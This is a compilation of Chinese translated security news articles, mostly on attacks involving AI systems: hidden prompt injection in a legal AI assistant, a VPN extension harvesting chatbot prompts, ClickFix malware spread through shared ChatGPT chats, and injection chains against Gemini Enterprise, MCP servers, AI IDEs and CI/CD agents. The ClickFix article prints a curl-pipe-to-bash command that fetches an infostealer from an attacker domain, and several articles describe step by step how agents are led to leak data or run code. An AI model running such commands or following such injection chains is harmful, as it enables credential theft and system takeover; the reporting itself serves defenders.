HackerNews 编译，转载请注明出处： 威科法律信息库旗下法律人工智能助手文森特，存在文档隐藏式提示注入攻击漏洞，攻击者可通过在用户浏览器生成虚假登录页面实施凭证窃取。攻击者在案件文件中植入白底白字的隐形代码，触发恶意超文本标记语言程序运行。文森特人工智能漏洞波及全球超 20 万家律所及威科法律信息库用户。 上述漏洞由 “提示防护” 公司的研究人员发现，他们已于本周一发布博客文章披露相关情况。 研究人员表示，这款专为律师打造的人工智能助手文森特，可能被黑客钻空子。黑客会在文档中植入隐藏文本，律所法务团队在不知情的情况下将文档上传至威科法律信息库平台，就会触发人工智能输出恶意超文本标记语言代码，随后该代码会在用户浏览器中加载运行。 这种间接提示注入攻击存在远程代码执行风险，最终会对毫无防备的威科法律信息库用户发起 “屏幕覆盖式” 钓鱼攻击。 屏幕覆盖式攻击是一种 “复杂攻击手段”，指在合法应用或网站界面上覆盖一层虚假界面 —— 本事件中具体表现为虚假登录页面，以此诱骗用户泄露敏感信息。 威科法律信息库官方称，这是一个综合性法律智能平台，旨在帮助法律从业者完成 “各类工作中的研究、分析及法律实务操作”。 该人工智能平台已被全球排名前十的八家律所采用。就在上月，全球领先的法律科技解决方案供应商克利欧公司以 10 亿美元的里程碑式交易收购威科法律信息库，使得使用该平台的律所、律师协会及政府机构数量突破 20 万家。 “我们已通过负责任的方式向威科法律信息库披露了这一漏洞。” 提示防护公司联合创始人兼董事总经理尚卡尔・克里希南表示，威科法律信息库 “迅速采取了有效行动，并依照我们的修复建议完成了系统更新”。 恶意弹窗可窃取登录信息 提示防护公司指出，这一新型远程代码执行漏洞可能被黑客操控，以未经授权的方式访问律所内部系统，进而可能导致大量敏感客户文件外泄。 研究人员将攻击流程拆解为 “三步攻击链”：首先通过提示注入手段，在网络来源的文档中植入 “白底白字” 的隐藏文本；随后，法务团队在案件研究过程中上传这些文档。 在本次研究案例中，隐藏文本以伪造证人证言的形式植入，且研究人员预先设定文森特人工智能需解析文档中的所有直接引语。 而当 “文森特人工智能读取文档并解析‘直接引语’—— 包括攻击者用白底白字植入的伪造证言时”，隐藏的恶意超文本标记语言代码会在受害者的浏览器中自动执行。 “当这段代码在聊天界面输出时，用户浏览器会将其当作文森特人工智能网页的一部分进行处理。” 克里希南表示，“恶意代码会加载攻击者的网站，并将其覆盖在用户的聊天界面之上。” 博客文章指出，攻击者搭建的仿冒网站与威科法律信息库的登录界面高度相似，通过生成极具迷惑性的钓鱼弹窗，窃取用户在虚假页面中输入的所有登录凭证。 强化威科法律信息库安全防护的建议 研究还指出，文森特人工智能模型还可能被诱导输出 “存储在标记语言超链接或超文本标记语言元素中的恶意脚本程序”。 克里希南称，这一漏洞可支持攻击者通过 “零点击数据窃取” 方式盗取信息、劫持用户会话、强制用户下载文件或进行加密货币挖矿，且 “每次打开聊天界面，攻击程序都会自动运行”。 会话令牌也存在被盗风险，一旦失窃，攻击者便可 “代表用户在威科法律信息库平台执行操作”，包括访问平台内存储的数据。 配图：提示防护公司 文森特人工智能钓鱼漏洞示意图 之四 博客文章指出，攻击者搭建的仿冒网站与威科法律信息库登录界面高度相似，通过生成极具迷惑性的钓鱼弹窗，窃取用户在虚假页面中输入的所有登录凭证。 提示防护公司建议相关机构采取以下防护措施： 确保在威科法律信息库的 “文件集” 功能中，所有来源不可信的文档均被清晰标记； 将不可信文档的可见权限设置为 “仅授权人员可见”，而非 “全组织可见”； 明令禁止用户上传来源未经核实的网络文档。     消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一款拥有”精选”徽章和六百万用户的 Google Chrome 扩展程序，被发现在用户不知情的情况下，收集他们输入到各类人工智能聊天机器人的所有提示词，包括 OpenAI ChatGPT、Anthropic Claude、Microsoft Copilot、DeepSeek、Google Gemini、xAI Grok、Meta AI 和 Perplexity。 这款有问题的扩展程序是 Urban VPN Proxy，在 Google Chrome 网上应用店的评分为 4.7 星。它被宣传为”访问任何网站的最佳安全免费 VPN，并能解锁内容”。其开发者是一家位于特拉华州、名为 Urban Cyber Security Inc. 的公司。在 Microsoft Edge 加载项市场中，它拥有 130 万次安装。 尽管声称允许用户”保护您的在线身份、保持安全并隐藏您的 IP 地址”，但在 2025 年 7 月 9 日，当版本 5.5.0 发布时，一项更新被推送给了用户。该版本默认启用了通过硬编码设置实现的 AI 数据收集功能。 具体而言，这是通过一个定制的执行器 JavaScript 来实现的，该脚本会针对每个目标 AI 聊天机器人（例如 chatgpt.js、claude.js、gemini.js）触发，以拦截和收集安装了该扩展程序的用户每次访问任何目标平台时的对话。 一旦脚本被注入，它会覆盖用于处理网络请求的浏览器 API——fetch() 和 XMLHttpRequest()——以确保每个请求首先通过扩展程序的代码路由，从而捕获对话数据，包括用户的提示词和聊天机器人的回复，并将其外泄到两个远程服务器（”analytics.urban-vpn[.]com” 和 “stats.urban-vpn[.]com”）。 该扩展程序捕获的具体数据列表如下： 用户输入的提示词 聊天机器人的回复 对话标识符和时间戳 会话元数据 使用的 AI 平台和模型 “Chrome 和 Edge 扩展默认会自动更新，” Koi Security 的 Idan Dardikman 在今天发布的一份报告中表示。”那些为了其宣称的 VPN 功能而安装了 Urban VPN 的用户，某天醒来时会发现新代码正在悄悄收集他们的 AI 对话记录。” 值得一提的是，截至 2025 年 6 月 25 日，Urban VPN 更新的隐私政策提到，它收集这些数据是为了增强安全浏览功能和用于营销分析，并且对所收集的 AI 提示词进行的任何其他二次使用都将在去标识化和匿名化的数据上进行—— “作为浏览数据的一部分，我们将收集最终用户查询或由 AI 聊天提供方生成的提示词和输出。也就是说，我们只对 AI 提示词和您与聊天 AI 互动的结果感兴趣。由于 AI 提示词所涉数据的性质，可能会处理一些敏感的个人信息。然而，此处理的目的并非收集个人或可识别数据。我们无法完全保证去除所有敏感或个人信息，但我们采取措施过滤或消除您可能通过提示词提交的任何标识符或个人数据，并对数据进行去标识化和聚合处理。” 与其共享”网络浏览数据”的第三方之一，是一家名为 BIScience 的关联广告情报和品牌监测公司。该 VPN 软件制造商指出，该公司使用原始（非匿名化）数据来创建”用于商业用途并与商业合作伙伴共享”的洞察报告。 值得注意的是，BIScience在今年 1 月初曾被一名匿名研究员点名，因其在具有误导性的隐私政策披露下，收集用户的浏览历史记录（或称点击流数据）。 据称，该公司向合作的第三方扩展开发者提供软件开发工具包，以收集用户的点击流数据，这些数据被传输到其控制下的 sclpfybn[.]com 域名及其他端点。 “BIScience 及其合作伙伴利用了 Chrome 网上应用店政策中的漏洞，主要是有限使用政策中列出的例外情况，即’批准的用例’，” 该研究员指出，并补充说他们”开发了据称需要访问浏览历史记录的用户端功能，以主张’为提供或改进您的单一目的所必需’的例外情况。” 在扩展程序的列表页面上，Urban VPN 还突出宣传了一项”AI 保护”功能，据称可以检查提示词是否包含个人数据，检查聊天机器人的回复中是否有可疑或不安全链接，并在用户提交提示词或点击链接前显示警告。 虽然这种监控被包装为防止用户意外分享任何个人信息，但开发者未提及的是，无论此功能是否启用，数据收集都会发生。 “该保护功能偶尔会显示关于与 AI 公司共享敏感数据的警告，” Dardikman 说。”而收集功能却将那些完全相同的敏感数据——以及其他所有内容——发送到 Urban VPN 自己的服务器，在那里被出售给广告商。该扩展程序警告您不要与 ChatGPT 共享您的电子邮件，同时却将您的整个对话内容外泄给数据中间商。” Koi Security 表示，他们在同一发布者的另外三款 Chrome 和 Microsoft Edge 扩展中也观察到了完全相同的 AI 数据收集功能，这使得其总安装基数超过八百万： 1ClickVPN Proxy Urban Browser Guard Urban Ad Blocker 所有这些扩展程序（Edge 版的 Urban Ad Blocker 除外）都带有”精选”徽章，给用户一种印象，即它们遵循了平台的”最佳实践，并符合高标准的用户体验和设计”。 “这些徽章向用户表明，这些扩展程序已经过审核并符合平台质量标准，” Dardikman 指出。”对许多用户来说，精选徽章是决定安装还是忽略一个扩展程序的关键——这是来自 Google 和 Microsoft 的隐含认可。” 这些发现再次表明，与扩展程序市场相关的信任如何被滥用以大规模收集敏感数据，尤其是在用户越来越多地与 AI 聊天机器人分享深度个人信息、寻求建议和讨论情感的时候。 消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： OpenAI周三透露，模型性能的激增已重塑了公司的内部规划。 根据一份新报告，通过CTF进行的能力评估显示，其性能从2025年8月GPT-5的27%提升至2025年11月GPT-5.1-Codex-Max的76%。 OpenAI警告称，一些即将推出的系统可能达到其“准备框架”中的“高”能力水平，这意味着它们最终可能协助完成从复杂入侵操作到零日漏洞利用开发等任务。 ThreatAware联合创始人兼首席执行官乔恩·阿博特表示，这一警告突显了关注基础防护的必要性。 “OpenAI警告新模型带来‘高’网络安全风险，这正是为什么确保安全基础绝对关键。AI可能正在加速攻击步伐，但我们最好的防御方式仍然是首先夯实基础。” 该公司还表示，正在通过开发多层次防护措施来应对这种可能性，旨在将先进能力引导至防御性结果。OpenAI补充说，其主要目标是加强网络安全团队的地位，这些团队目前仍面临人手不足和资源匮乏的问题。 加强行业整体理解 为管理网络工作流程中固有的双重用途风险，该公司概述了一个基于多个组件的深度防御策略： 访问控制、基础设施加固、出口控制和监控 引导模型避开有害请求，同时保持对教育和防御的实用性培训 能够阻止或重定向不安全活动的全系统检测工具 由外部专家进行的端到端红队测试 “这些防护措施旨在随着威胁形势的发展而演变，”该公司表示。 阿博特指出，能力的提升使得长期存在的威胁更加危险。 “传统威胁与AI实现的规模和精度相结合，形成了一种特别有害的组合，”他解释道。 “随着模型能够开发可用的零日远程漏洞利用或协助复杂、隐蔽的入侵，犯罪分子的入门门槛已大幅降低。” OpenAI表示，正在与全球专家协调，以改进防御性AI的实际应用，并正在为合格用户准备可信访问计划。 另一项名为“Aardvark”的计划已进入封闭测试阶段。这一智能安全研究代理可以扫描代码库、识别漏洞并提出修复方案，并在开源项目中发现了新的CVE漏洞。 OpenAI表示，还将启动一个“前沿风险委员会”，就负责任的能力使用提供建议，并通过“前沿模型论坛”进一步合作，以完善共享威胁模型并改进整个生态系统的缓解策略。 消息来源：infosecurity-magazine； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一场新的恶意活动正通过一种新颖的攻击方式针对macOS用户，该攻击利用了ChatGPT的官方网站。 攻击者采用一种名为“ClickFix”的技术，通过在合法的chatgpt.com域名上发布虚假的安装指南来传播AMOS信息窃取木马。 此次活动利用了ChatGPT的聊天分享功能，任何用户都可以创建一个公共对话，并通过一个看似源自OpenAI官方网站的链接与他人分享。 攻击始于谷歌上的付费搜索广告。当用户搜索“chatgpt atlas”时，他们会遇到看似直接跳转到官方ChatGPT域名的赞助商链接。 谷歌搜索结果中的一个赞助商链接指向一个伪装成“macOS版ChatGPT Atlas”的恶意软件安装指南，该指南竟托管在官方ChatGPT网站上（来源：卡巴斯基） 该广告显示标题“ChatGPT™ Atlas for macOS – 下载Mac版ChatGPT Atlas”，这使其看起来完全合法。 点击这些广告的用户会被引导至一个共享的ChatGPT对话，其中包含针对不存在的Atlas浏览器的虚假安装说明。 经过深入分析，卡巴斯基安全研究人员确认，恶意行为者使用了提示词工程，迫使ChatGPT生成了一个看似可信的安装指南。 攻击者在将聊天公开之前，清除了聊天记录以移除任何可疑内容。 这个所谓的macOS版Atlas安装指南，仅仅是一个匿名用户与ChatGPT之间的共享聊天记录（来源：卡巴斯基） 该指南出现在chatgpt.com/share/子域名下，这可能会让那些未能意识到这只是一个共享对话而非OpenAI官方内容的用户，感觉其更加可信。 感染机制 虚假安装指南指示用户在Mac上打开终端应用程序，并运行一个特定命令。 恶意代码如下所示： /bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)” 此命令会从攻击者控制的服务器atlas-extension.com下载恶意脚本，并立即在受害者的计算机上执行。 脚本执行后，会提示输入系统密码，并反复询问直到输入正确密码为止。一旦密码被提供，脚本就会下载AMOS信息窃取木马，并使用窃取的凭证进行安装。 如果你询问ChatGPT是否应该遵循收到的指令，它会回答这不安全。 AMOS能够窃取Chrome和Firefox浏览器的密码、Cookie及其他浏览器数据。它还会从Electrum、Coinomi和Exodus等应用程序中窃取加密货币钱包信息。 该恶意软件会从桌面、文档和下载等文件夹中收集TXT、PDF和DOCX扩展名的文件。此外，它还会安装一个后门程序，该程序会在系统启动时自动运行，使攻击者能够持久远程访问受感染的系统。   消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 近期出现了一种新的恶意软件攻击活动，黑客通过利用合法的AI平台，直接向毫无防备的用户传播恶意代码。 攻击详情 攻击者通过谷歌搜索的赞助结果，将用户引导至伪造的ChatGPT和DeepSeek共享聊天链接。这些用户原本可能只是在搜索常见的macOS故障排除方法，例如“如何清理Mac存储空间”。 这些共享聊天看似提供了有用的系统操作指南，但实际上隐藏了用于入侵目标设备的恶意指令。 攻击始于用户接触到一条看似正规的共享对话，该对话会给出清理Mac存储空间的分步教程。 但教程中嵌有Base64编码指令，一旦执行，就会下载并运行一款复杂的多阶段恶意软件程序。 这种手法的狡猾之处在于，它绕过了AI平台通常实施的安全检查，使攻击者能够通过官方渠道直接向用户传递具有针对性的恶意指令。 感染流程始于一个bash脚本，该脚本会伪装成凭据验证弹窗，诱导用户输入系统密码。密码一旦被窃取，恶意软件便会借此提升权限，并从攻击者控制的服务器下载主恶意程序二进制文件。 Breakpoint Security的安全分析师将此样本识别为Shamus——一种已知的信息窃取和加密货币盗窃程序，已在安全社区中被广泛记录。 复杂策略 该恶意软件的复杂性体现在其多层编码和检测规避策略上。它结合算术编码、XOR编码和定制的6位解码器，以隐藏恶意代码，从而避免被分析工具发现。这种混淆手段使得安全研究人员仅通过静态分析极难识别其真实功能。 一旦安装成功，恶意软件会通过创建在系统启动时自动运行的LaunchDaemon，实现持久化系统访问。这确保了即使用户重启计算机，恶意软件仍能保持访问权限。其核心功能针对多类敏感数据，包括从Chrome、Firefox以及其他12款基于Chromium的浏览器中窃取Cookie和密码。 威胁还延伸至加密货币钱包，该恶意软件专门针对15种不同的桌面和硬件钱包应用程序，包括Ledger Live、Trezor Suite、Exodus、Coinomi、Electrum和Bitcoin Core等。此外，它还会窃取整个macOS钥匙串数据库、Telegram会话数据、VPN配置文件以及桌面和Documents文件夹中的文件。 在数据收集完成后，所有窃取的信息会被压缩，并通过加密通信传输到攻击者的命令与控制服务器。 这一攻击活动代表了恶意软件传播方式的复杂进化，展示了威胁行为者如何不断寻找新方法来绕过安全防护措施，入侵用户系统。   消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 谷歌 Gemini 企业级 AI 生态系统中一个新发现的提示词注入漏洞已被修复，该漏洞曾允许攻击者窃取敏感的 Gmail 邮件、文档及日历数据，但专家表示，这只是 AI 漏洞时代的开端。 “GeminiJack” 漏洞存在于谷歌 Gemini Enterprise（此前也存在于 Vertex AI Search）中，由诺玛实验室（Noma Labs）的研究人员于今年 5 月发现，在与谷歌合作完成修复后，该漏洞已于本周二被公开披露。 攻击者利用企业对谷歌 Workspace 工具及共享功能的依赖，能够操纵日常工作流程，进而访问并窃取企业敏感信息。 诺玛实验室指出：“一份共享的谷歌文档、一则谷歌日历邀请，甚至一封 Gmail 邮件，都能瞬间成为侵入企业数据的持续性开放通道。” 更关键的是，诺玛实验室称，与传统软件漏洞不同，GeminiJack 并非常规缺陷，而是谷歌企业级 AI 系统在解读用户提供内容时存在的架构性弱点。 同时，由于该漏洞无需用户任何操作即可造成危害，它也被视为迄今企业级云环境中遭遇的最严重 AI 驱动型安全风险之一。 诺玛实验室在其安全博客中解释：“目标员工无需进行任何点击，不会出现任何警示信号，也不会触发任何传统安全工具。” DryRun Security 首席执行官詹姆斯・威克特（James Wickett）表示：“GeminiJack 这类事件表明，提示词注入和数据泄露已不再是边缘性研究课题，这些漏洞是企业（即便是大型科技公司）将大语言模型接入系统时，深层架构问题的外在表现。” 漏洞攻击原理 诺玛实验室研究人员称，攻击者可在共享文档或消息中嵌入隐藏指令。 当员工后续使用谷歌 Gemini Enterprise AI 执行常规搜索时，AI 助手会自动检索被篡改的内容、执行恶意指令，并通过伪装的外部图片请求，轻松将敏感数据外传。 借助 GeminiJack 零点击漏洞，单次常规 AI 查询就可能泄露以下信息： 数年的内部邮件，包括客户沟通及财务往来信息 完整的日历历史，可泄露商务谈判、合作关系及企业组织运作情况 全部文档库，涵盖合同文件至技术架构方案等各类资料 谷歌方面表示 “已对漏洞披露做出迅速响应”，其团队与诺玛实验室协作 “厘清了攻击路径并实施了全面的缓解措施”。 诺玛实验室称，此次修复解决了检索增强生成（RAG）处理管道中指令与内容混淆的核心问题。 据英伟达定义，检索增强生成（RAG）是一套循环式处理流程，可实时完成文档预处理、数据摄入及嵌入向量生成，将用户查询转化为易于理解的信息，同时最大限度降低模型 “幻觉” 现象。 而所有窃取的数据，都会通过看似正常的图片请求直接流向攻击者，这类请求与合法流量难以区分。 诺玛实验室研究人员评价道：“这是 AI 过度自主权限的典型体现。AI 助手完全按设计逻辑运行，却沦为了可想象到的最高效企业间谍工具。” 谷歌指出，作为修复措施的一部分，Vertex AI Search 现已与 Gemini Enterprise 完全分离，确保二者不再共用同一大语言模型驱动的检索管道。 对于未来的 AI 注入攻击，威克特指出 “我们仍处于 AI 应用初期阶段”。 他认为，在团队为模型输入、检索来源及智能体操作建立起真正的防护屏障前，未来几年内类似 GeminiJack 的故障还会不断出现。 威克特表示：“若缺乏此类管控且不重视构建安全的 AI 应用，这类安全事件大概率会愈发频繁。”     消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 恶意 MCP 服务器引发提示词注入攻击 安全研究人员发现了模型上下文协议（MCP）采样功能中存在的严重漏洞，同时揭示了恶意服务器如何利用集成大语言模型（LLM）的应用，实施资源窃取、对话劫持以及未授权系统修改等攻击行为。 攻击向量 攻击机制 攻击影响 资源窃取 在采样请求中植入隐藏指令，诱导大语言模型生成额外的不可见内容 在用户无感知的情况下运行未授权工作负载，消耗人工智能计算配额与应用程序编程接口（API）额度 对话劫持 改变助手在整个会话中的行为模式，可能降低其使用价值或触发有害操作 全程篡改助手交互表现，既会削弱工具实用性，也可能诱发恶意行为 秘密工具调用 嵌入指令使大语言模型在用户未明确知晓或同意的情况下调用各类工具 可实现未授权文件操作、恶意程序驻留，甚至可能造成数据窃取或系统篡改 模型上下文协议由 Anthropic 公司于 2024 年 11 月推出，其作用是规范大语言模型与外部工具及数据源的集成方式。尽管该协议的初衷是提升人工智能的能力，但协议中的采样功能（允许 MCP 服务器请求大语言模型生成完成内容）在缺乏完善安全防护措施的情况下，会带来极大的安全风险。 三大核心攻击向量 帕洛阿尔托网络的研究人员在一款广泛使用的代码辅助工具上，完成了三类概念验证攻击的演示，具体如下： 资源窃取用户向代码辅助工具提出需求，希望其帮忙总结当前代码文件。 攻击者在采样请求中注入隐藏指令，使大语言模型在向用户呈现正常响应的同时，生成未授权内容。 例如某恶意代码总结工具，会在合法代码分析内容之外，额外附加生成虚构故事的指令，在用户毫无察觉的情况下消耗大量计算资源与 API 额度。 对话劫持 被攻陷的 MCP 服务器可植入持久性指令，影响整个对话会话。用户虽能正常收到代码文件总结内容，但隐藏提示会强制人工智能助手在后续所有回复中 “模仿海盗口吻说话”。这一演示直观体现了恶意服务器可从根本上改变系统行为，进而可能破坏工具核心功能。 秘密工具调用 恶意服务器利用提示词注入触发未授权的工具执行操作。研究人员证实，隐藏指令可触发文件写入操作，进而实现数据窃取、恶意程序持久化驻留，以及未经用户明确许可的系统修改。其攻击链路为：大语言模型遵照 MCP 隐藏提示的要求，在响应内容中嵌入恶意指令；随后代码辅助工具会执行这些暗藏的恶意指令，最终响应恶意工具调用请求。 漏洞根源与防御方案 该漏洞的根源在于 MCP 采样功能的隐式信任模型，以及内置安全管控机制的缺失 —— 服务器可篡改提示词与响应内容，在伪装成正常工具的同时，悄悄植入隐藏指令。 有效的防御需要构建多层防护体系： 采用严格模板对请求进行净化，实现用户内容与服务器修改内容的分离； 对响应内容进行过滤，剔除类指令表述； 增设访问控制机制，限制服务器的操作权限； 按操作类型设置令牌额度限制； 要求工具执行操作必须获得用户明确批准。 帕洛阿尔托网络建议，各组织应评估人工智能安全解决方案，包括运行时防护平台与全面的安全评估服务。这些研究结论也凸显出，随着大语言模型集成在企业级应用中日益普及，保障人工智能基础设施安全已成为至关重要的工作。     消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 研究人员披露了多款 AI 驱动的集成开发环境中存在的 30 余个安全漏洞。这些漏洞通过将提示注入技术与工具合法功能相结合，可实现数据窃取与远程代码执行攻击。 安全研究员阿里・马尔祖克（化名 MaccariTA）将这些漏洞统称为 “IDEsaster”。受影响的主流 IDE 及插件包括 Cursor、Windsurf、Kiro.dev、GitHub Copilot、Zed.dev、Roo Code、Junie 和 Cline 等，其中 24 个漏洞已分配 CVE 编号。 马尔祖克表示表示：“所有接受测试的 AI IDE 都受到了多个通用攻击链的影响，这是本次研究中最令人意外的发现。” “所有 AI IDE（及集成的代码助手）在其威胁模型中都忽略了基础软件本身。它们认为这些长期存在的功能本质上是安全的，但一旦加入能够自主行动的 AI 代理，这些功能就可能被武器化，成为数据窃取和远程代码执行的攻击载体。” 这些漏洞的核心攻击链路包含 AI 驱动 IDE 共有的三个向量： 绕过大型语言模型（LLM）的安全防护机制，劫持上下文并执行攻击者指令（即提示注入）； 通过 AI 代理的自动批准工具调用，在无需用户交互的情况下执行特定操作； 触发 IDE 的合法功能，突破安全边界以泄露敏感数据或执行任意命令。 此类漏洞与以往的攻击链不同，以往多是利用提示注入结合存在漏洞的工具（或滥用合法工具执行读写操作），修改 AI 代理配置以实现代码执行等非预期行为。 而 IDEsaster 的显著特点是，借助提示注入技术和代理工具，激活 IDE 的合法功能，最终达成信息泄露或命令执行目的。 上下文劫持的实现方式多样： 利用用户添加的上下文引用，比如包含隐藏字符的粘贴链接或文本，这些字符对人眼不可见，但可被 LLM 解析； 通过模型上下文协议（MCP）服务器，借助工具投毒、“地毯式攻击”（rug pulls）实施上下文污染； 当合法 MCP 服务器解析来自外部的攻击者可控输入时，也可能引发上下文污染。 该攻击链可实现的典型攻击场景如下： CVE-2025-49150（Cursor）、CVE-2025-53097（Roo Code）、CVE-2025-58335（JetBrains Junie）、GitHub Copilot（未分配 CVE）、Kiro.dev（未分配 CVE）及 Claude Code（已通过安全警告修复）：通过提示注入，利用合法工具（“read_file”）或存在漏洞的工具（“search_files”“search_project”）读取敏感文件，再通过合法工具（“write_file”“edit_file”）写入包含远程 JSON 模式的 JSON 文件（该模式托管于攻击者控制的域名），当 IDE 发起 GET 请求时，数据会被泄露； CVE-2025-53773（GitHub Copilot）、CVE-2025-54130（Cursor）、CVE-2025-53536（Roo Code）、CVE-2025-55012（Zed.dev）及 Claude Code（已通过安全警告修复）：通过提示注入编辑 IDE 配置文件（“.vscode/settings.json” 或 “.idea/workspace.xml”），将 “php.validate.executablePath” 或 “PATH_TO_GIT” 设置为包含恶意代码的可执行文件路径，实现代码执行； CVE-2025-64660（GitHub Copilot）、CVE-2025-61590（Cursor）及 CVE-2025-58372（Roo Code）：通过提示注入编辑工作区配置文件（*.code-workspace），覆盖多根工作区设置，达成代码执行。 值得注意的是，后两种攻击场景依赖于 AI 代理的文件写入自动批准配置 —— 这使得攻击者能够通过操控提示，写入恶意工作区设置。而默认情况下，工作区内文件的写入操作会自动获批，因此无需用户交互或重新打开工作区，即可实现任意代码执行。 提示注入和 “越狱” 是该攻击链的第一步，马尔祖克对此提出以下建议： 仅在可信项目和文件中使用 AI IDE（及 AI 代理）。恶意规则文件、隐藏在源代码或其他文件（如 README）中的指令，甚至文件名，都可能成为提示注入载体； 仅连接可信的 MCP 服务器，并持续监控这些服务器的变化（即使是可信服务器也可能被入侵）。充分了解 MCP 工具的数据流（例如，合法 MCP 工具可能从攻击者控制的来源获取信息，如 GitHub 拉取请求）； 手动审查添加的来源（如通过 URL），排查隐藏指令（HTML 注释、CSS 隐藏文本、不可见 Unicode 字符等）； 建议 AI 代理和 AI IDE 开发者为 LLM 工具应用最小权限原则，减少提示注入载体，强化系统提示，使用沙箱环境运行命令，并针对路径遍历、信息泄露和命令注入进行安全测试。 此次漏洞披露之际，研究人员还发现了 AI 编程工具中的其他多个漏洞，影响广泛： OpenAI Codex CLI 存在命令注入漏洞（CVE-2025-61260）：该程序默认信任通过 MCP 服务器条目配置的命令，并在启动时无需用户许可即可执行。攻击者若能篡改代码仓库的 “.env” 和 “./.codex/config.toml” 文件，可实现任意命令执行； Google Antigravity 存在间接提示注入漏洞：通过投毒网络来源操控 Gemini 模型，从用户 IDE 中窃取凭证和敏感代码，并利用浏览器子代理访问恶意网站以泄露信息； Google Antigravity 存在多个漏洞：可通过间接提示注入实现数据窃取和远程命令执行，还能利用恶意可信工作区植入持久化后门，使应用未来每次启动时都执行任意代码； 新型漏洞 “PromptPwnd”：针对连接到存在漏洞的 GitHub Actions（或 GitLab CI/CD 流水线）的 AI 代理，通过提示注入诱使其执行内置特权工具，导致信息泄露或代码执行。 随着智能代理 AI 工具在企业环境中日益普及，这些发现表明，AI 工具显著扩大了开发设备的攻击面 —— 核心原因在于 LLM 无法区分用户完成任务的指令与外部来源的输入，而这些外部输入可能包含嵌入的恶意提示。 Aikido 研究员赖因・戴尔曼表示：“任何使用 AI 进行问题分类、拉取请求标记、代码建议或自动回复的代码仓库，都面临提示注入、命令注入、密钥泄露、仓库被入侵及上游供应链受损的风险。” 马尔祖克还指出，这些发现凸显了 “AI 安全适配”原则的重要性。这一由他提出的新范式，旨在应对 AI 功能带来的安全挑战，确保产品不仅默认安全、设计安全，还能充分考虑 AI 组件可能被长期滥用的风险。 “这再次证明了‘AI 安全适配’原则的必要性，” 马尔祖克说，“将 AI 代理与现有应用相结合，会产生新的潜在风险。”     消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 网络安全公司 Aikido Security 披露了一类新型提示注入漏洞，代号 “PromptPwnd”。该漏洞影响集成了 AI 代理的 GitHub Actions 和 GitLab CI/CD 流水线，涉及谷歌 Gemini CLI、Claude Code、OpenAI Codex 等主流 AI 工具。目前已确认至少 5 家《财富》500 强企业受此影响，相关证据表明该漏洞存在广泛传播风险。 作为首个发现并披露该漏洞模式的机构，Aikido Security 已开源 Opengrep 检测规则，助力安全厂商快速识别漏洞。这是业界首次证实 AI 提示注入攻击成功攻陷 CI/CD 流水线的真实案例，标志着此类攻击已从理论走向实际威胁。 漏洞原理与攻击机制 漏洞根源在于软件开发流程中 AI 工具的广泛应用 —— 当前许多团队使用 AI 代理实现问题自动分类、拉取请求标签标注等自动化任务，但未对输入数据进行严格校验。具体攻击路径如下： 输入注入：攻击者在 GitHub 议题标题、正文等不可信来源中嵌入恶意指令； Prompt 污染：CI/CD 流水线将这些未经验证的用户输入直接传入 AI 提示词； 指令误判：AI 模型将恶意指令误认为合法操作命令，而非普通数据； 特权执行：AI 通过集成工具执行未授权操作，包括编辑拉取请求、窃取敏感凭证（如 API 密钥、令牌）等核心资产。 典型案例：谷歌 Gemini CLI 仓库漏洞 Aikido Security 在谷歌官方 Gemini CLI 代码仓库中发现了该漏洞的典型应用场景：其工作流将 GitHub 议题中的不可信用户输入直接传入 AI 模型提示词。 研究人员通过提交包含隐藏指令的恶意议题完成概念验证（PoC）：AI 代理解析恶意指令后，执行了编辑该议题的命令，将敏感 API 密钥和令牌直接嵌入议题正文，导致核心凭证泄露。在 Aikido 遵循负责任披露原则通报后，谷歌于 4 天内完成漏洞修复。 漏洞影响范围 该漏洞并非单一 AI 代理专属问题。研究发现，众多 AI 驱动的 GitHub Actions（包括 Claude Code Actions、OpenAI Codex Actions）均存在类似架构设计缺陷，尤其当安全配置不当（如允许非特权用户触发工作流）时，漏洞利用风险显著提升。 修复建议 为防范 “PromptPwnd” 漏洞，Aikido Security 提出以下核心修复措施： 限制 AI 工具权限：禁用 AI 代理的高危操作权限，避免其具备编辑议题、拉取请求等写入权限； 严格校验输入：禁止将不可信用户输入直接注入 AI 提示词；若无法避免，需进行数据清洗与全面验证； ** treating AI 输出为不可信 **：将 AI 生成的所有输出视为未经验证的代码，未经校验不得执行； 强化凭证保护：通过 IP 地址限制 GitHub 令牌的访问范围，降低凭证泄露后的风险扩散； 主动漏洞扫描：使用 Aikido 提供的免费扫描工具或开源工具，检测 GitHub/GitLab 仓库的.yml 配置文件中是否存在相关漏洞。       消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

